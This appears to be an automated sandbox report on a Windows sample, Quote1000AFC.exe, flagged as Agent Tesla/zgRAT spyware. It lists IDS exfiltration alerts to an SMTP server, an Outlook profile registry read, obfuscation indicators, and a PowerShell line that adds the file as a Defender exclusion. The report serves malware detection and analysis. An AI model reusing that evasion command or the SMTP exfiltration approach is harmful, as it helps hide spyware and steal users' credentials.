                        Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.8:49708 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.8:49708 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.8:49708 -> 199.79.62.115:587
                        Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.8:49708 -> 199.79.62.115:587
                        Source: global trafficTCP traffic: 192.168.2.8:49708 -> 199.79.62.115:587
                        Source: Joe Sandbox ViewIP Address: 199.79.62.115 199.79.62.115
                        Source: global trafficTCP traffic: 192.168.2.8:49708 -> 199.79.62.115:587
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: global trafficDNS traffic detected: DNS query: mail.mbarieservicesltd.com
                        Source: Quote1000AFC.exe, 00000004.00000002.2702375590.000000000316A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.mbarieservicesltd.com
                        Source: Quote1000AFC.exe, 00000000.00000002.1481497304.0000000002D31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                        System Summary

                        barindex
                        Source: 0.2.Quote1000AFC.exe.3d55808.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 0_2_07A61E200_2_07A61E20
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 0_2_02C0DE340_2_02C0DE34
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 0_2_071D04600_2_071D0460
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 0_2_071D70A00_2_071D70A0
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 0_2_071D80E80_2_071D80E8
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 0_2_071D04520_2_071D0452
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 0_2_071DB3D80_2_071DB3D8
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 0_2_071DB3C90_2_071DB3C9
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 0_2_071DBABA0_2_071DBABA
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 0_2_071DBAC80_2_071DBAC8
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 4_2_017D41404_2_017D4140
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 4_2_017D4D584_2_017D4D58
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 4_2_017D44884_2_017D4488
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 4_2_069BE4984_2_069BE498
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 4_2_069B82084_2_069B8208
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 4_2_069B92484_2_069B9248
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 4_2_069BAB704_2_069BAB70
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 4_2_069B00404_2_069B0040
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 4_2_069B63F04_2_069B63F0
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 4_2_069B89904_2_069B8990
                        Source: Quote1000AFC.exeBinary or memory string: OriginalFilename vs Quote1000AFC.exe
                        Source: Quote1000AFC.exe, 00000000.00000002.1472891552.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Quote1000AFC.exe
                        Source: Quote1000AFC.exe, 00000000.00000002.1482260990.0000000003D39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs Quote1000AFC.exe
                        Source: Quote1000AFC.exe, 00000000.00000002.1482260990.0000000003D39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Quote1000AFC.exe
                        Source: Quote1000AFC.exe, 00000000.00000002.1482260990.0000000003D39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Quote1000AFC.exe
                        Source: Quote1000AFC.exe, 00000000.00000002.1490518252.00000000079F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Quote1000AFC.exe
                        Source: Quote1000AFC.exe, 00000000.00000002.1489117798.00000000071A0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Quote1000AFC.exe
                        Source: Quote1000AFC.exe, 00000000.00000002.1481497304.0000000002D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs Quote1000AFC.exe
                        Source: Quote1000AFC.exe, 00000000.00000000.1445381836.0000000000A10000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezDux.exe" vs Quote1000AFC.exe
                        Source: Quote1000AFC.exe, 00000004.00000002.2700732625.000000000042C000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilename7b99aba2-3c62-4861-97de-170caa2c3039.exe4 vs Quote1000AFC.exe
                        Source: Quote1000AFC.exe, 00000004.00000002.2700887084.0000000000FD9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Quote1000AFC.exe
                        Source: Quote1000AFC.exeBinary or memory string: OriginalFilenamezDux.exe" vs Quote1000AFC.exe
                        Source: Quote1000AFC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: 0.2.Quote1000AFC.exe.3d55808.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                        Source: Quote1000AFC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: 0.2.Quote1000AFC.exe.71a0000.4.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.raw.unpack, O.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.raw.unpack, P.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Quote1000AFC.exe.3f52a18.2.raw.unpack, N.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, JJ6xFf7mKtA4lS5r3v.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, xxv979QMCETu81wijB.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, xxv979QMCETu81wijB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, xxv979QMCETu81wijB.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, xxv979QMCETu81wijB.csSecurity API names: _0020.SetAccessControl
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, xxv979QMCETu81wijB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, xxv979QMCETu81wijB.csSecurity API names: _0020.AddAccessRule
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, JJ6xFf7mKtA4lS5r3v.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/6@3/1
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quote1000AFC.exe.logJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whi5hins.b1u.ps1Jump to behavior
                        Source: Quote1000AFC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: Quote1000AFC.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Quote1000AFC.exeReversingLabs: Detection: 31%
                        Source: Quote1000AFC.exeVirustotal: Detection: 43%
                        Source: unknownProcess created: C:\Users\user\Desktop\Quote1000AFC.exe "C:\Users\user\Desktop\Quote1000AFC.exe"
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe"
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess created: C:\Users\user\Desktop\Quote1000AFC.exe "C:\Users\user\Desktop\Quote1000AFC.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Quote1000AFC.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeProcess created: C:\Users\user\Desktop\Quote1000AFC.exe "C:\Users\user\Desktop\Quote1000AFC.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: iconcodecservice.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                        Source: Quote1000AFC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: Quote1000AFC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                        Data Obfuscation

                        barindex
                        Source: 0.2.Quote1000AFC.exe.71a0000.4.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, xxv979QMCETu81wijB.cs.Net Code: REG5KH44H9 System.Reflection.Assembly.Load(byte[])
                        Source: 0.2.Quote1000AFC.exe.79f0000.5.raw.unpack, xxv979QMCETu81wijB.cs.Net Code: REG5KH44H9 System.Reflection.Assembly.Load(byte[])
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 4_2_069B2E34 push es; retf 4_2_069B2E4C
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 4_2_069B34B8 push eax; retf 4_2_069B34BD
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 4_2_069B53F0 push C0335006h; mov dword ptr [esp], eax4_2_069B5423
                        Source: C:\Users\user\Desktop\Quote1000AFC.exeCode function: 4_2_069B2190 push eax; retf 4_2_069B2199
                        Source: Quote1000AFC.exeStatic PE information: section name: .text entropy: 7.70390040559928
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, Br40tUz1Ya1axtMoEu.csHigh entropy of concatenated method names: 'afIBxo1cA6', 'W22B7GiJsw', 'bhdB2QqLrj', 'WFHB8I7ZbC', 'wfWBqKiiOj', 'autBF0YJdZ', 'lvLBMGKE6Z', 'CqpBhGQwqe', 'puWBVkqKSw', 'jJdB4hIhr6'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, WlO1MHfEDhmWAxANRw.csHigh entropy of concatenated method names: 'ab2L3tfKLU', 'XRLLORYUDI', 'B04LL1tkJ3', 'rpRL6Fnk8p', 'h8yLo5iJYL', 'F3aLhVX2pg', 'Dispose', 'qceIuTlv9h', 'XRrIT3oH7I', 'd1BIYP33ak'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, dsR6pf1i3WArO0nCn8.csHigh entropy of concatenated method names: 'RjZWZ3byCi', 'MTVWk4TfOU', 'UueYHOdJpT', 'wt1YFCJYQX', 'VtSYMA6Gl4', 'ySpYPtE5E4', 'qu2YlOhcJs', 'pMtYexhyf3', 'lYuYtMJUJU', 'TgiYJVqKPc'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, f9cb4dR5odlHbfeq908.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Br7jLikRiq', 'KYIjBcjuBB', 'xtGj64X5RQ', 'LNejjDxg2i', 'ul9josABpQ', 'hmVjDaYkK4', 'pTajhwh0bH'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, unRH8MSNVJDPFNHqS1.csHigh entropy of concatenated method names: 'vgv3J4K8en', 'ISl30Ligc6', 'O4v3SunWRB', 'hRB3cVRoRR', 'S8E3qstPQ0', 'M9J3HYgqvf', 'PJb3F4MTCt', 'Fxp3MnG7cK', 'kDW3PNQF4P', 'iGB3lnr9pr'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, WtmYa85GbLK1fNEU0G.csHigh entropy of concatenated method names: 'VrFRgJ6xFf', 'YKtRQA4lS5', 'WJhRC1nOFe', 'iKORXm9sR6', 'PnCR3n89Xq', 'SZ0Rd8BFmZ', 'ReDql8ZNhvJ8dKiStf', 'lpwhh7QmhQ2fLqvNuC', 'kP3RRhkr1Q', 'Qp6R9Yvlyh'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, yAYBZtTXbh57NMlVjU.csHigh entropy of concatenated method names: 'Dispose', 'xmWRvAxANR', 'hEMGqj2tDH', 'qdsqBebVg3', 'ePeRmGTmdr', 'mMERzl5Xga', 'ProcessDialogKey', 'hTFGUhoExS', 'qFNGRGQcGx', 'i3UGGyRo4Z'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, xxv979QMCETu81wijB.csHigh entropy of concatenated method names: 'N2f9wTyagy', 'WAU9ulk810', 'w499TmthmC', 'xRE9YOyHPg', 'GUx9WMX9aP', 'pMj9rAtqy5', 'kJc9g4sJ6i', 'mPc9QAtxvg', 'Jau9A0O7AE', 'kQ89CnK5cD'
                        Source: 0.2.Quote1000AFC.exe.3fbfe38.3.raw.unpack, cXqaZ088BFmZTQ9F5Q.csHigh entropy of concatenated method names: 'Xccrw1LQG4', 'b6QrTDWjXC', 'OTorWkObuf', 'vZPrgIA7I3', 'xvbrQtwMJ1', 'zMwWbwhr3g', 'lh6WpwUMPX', 'jqDWfOkMpy', 'B9LWychl8d', 'nbvWvsfcyP'
